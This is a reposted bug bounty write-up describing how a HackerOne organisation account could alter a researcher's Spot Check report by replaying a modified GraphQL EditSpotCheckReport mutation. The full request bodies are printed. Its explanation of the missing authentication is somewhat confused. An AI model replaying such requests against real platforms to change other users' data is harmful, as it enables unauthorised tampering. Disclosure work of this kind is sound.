.png)
5 months ago
28 BOOK THIS SPACE FOR AD
ARTICLE AD
a hacker discovered that team members or HackerOne staff can modify a user’s Spot Check write-up
first:
there is no user interface option or button that allow any of team member or hackerOne stuff edit the hacker’s(user’s) write-up
so how to do it:
the hacker’s(user’s) submit a write-up then Edit the write up and while after that he intercept the GraphQL request and it look like that
{“operationName”: “EditSpotCheckReport”,
“variables”: {
“input”: {
“spot_check_report_id”: “Z2lkOi8vaGFja2Vyb25lL1Nwb3RDaGVja1JlcG9ydC81MDU=”,
“executive_summary”: “x”,
“scope”: “x”,
“methodology_and_tooling”: “X”,
“findings_and_evidence”: “none”,
“time_spent”: 0,
“files”: [],
“removed_attachment_ids”: [],
“report_ids”: []
},
“product_area”: “hacker_dashboard”,
“product_feature”: “redirect_overview”
},
“query”: “mutation EditSpotCheckReport($input: EditSpotCheckReportInput!) {\n editSpotCheckReport(input: $input) {\n spot_check_report {\n id\n _id\n state\n __typename\n }\n was_successful\n errors {\n edges {\n node {\n id\n type\n field\n message\n __typename\n }\n __typename\n }\n __typename\n }\n __typename\n }\n}\n”
}
and if you notice in that request there is a critical factor make the hacker think that there is a bug there is no User Authentication there is no authToken to ensure the request is made from authenticated user it must look like that as an example
{"operationName": "EditSpotCheckReport",
"variables": {
"input": {
"spot_check_report_id": "Z2lkOi8vaGFja2Vyb25lL1Nwb3RDaGVja1JlcG9ydC81MDU=",
"executive_summary": "Updated Summary",
"scope": "Updated Scope",
"methodology_and_tooling": "Updated Methodology",
"findings_and_evidence": "Updated Evidence",
"time_spent": 5,
"files": [],
"removed_attachment_ids": [],
"report_ids": []
}
},
"query": "mutation EditSpotCheckReport($input: EditSpotCheckReportInput!) {\n editSpotCheckReport(input: $input) {\n spot_check_report {\n id\n _id\n state\n __typename\n }\n was_successful\n errors {\n edges {\n node {\n id\n type\n field\n message\n __typename\n }\n __typename\n }\n __typename\n }\n __typename\n }\n}\n",
"authToken": "Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9..."
}
but because in the real or found request there is no proper authentication and authorization checks and no detailed audit logging So the hacker logging into the organisation account and sending the modified GraphQl request and guess what happen the user write-up changed and if you ask what he modify he modify the executive_summary, scope, methodology_and_tooling, and findings_and_evidence fields to any other value.
there is another step is to verify by login with user account it is changed.
the last thing if you ask what is the organization account it is for companies that host bug bounty program on hackerone.
stay tuned for next attacks and don’t forget to subscribe
Bengali (Bangladesh) · 
English (United States) ·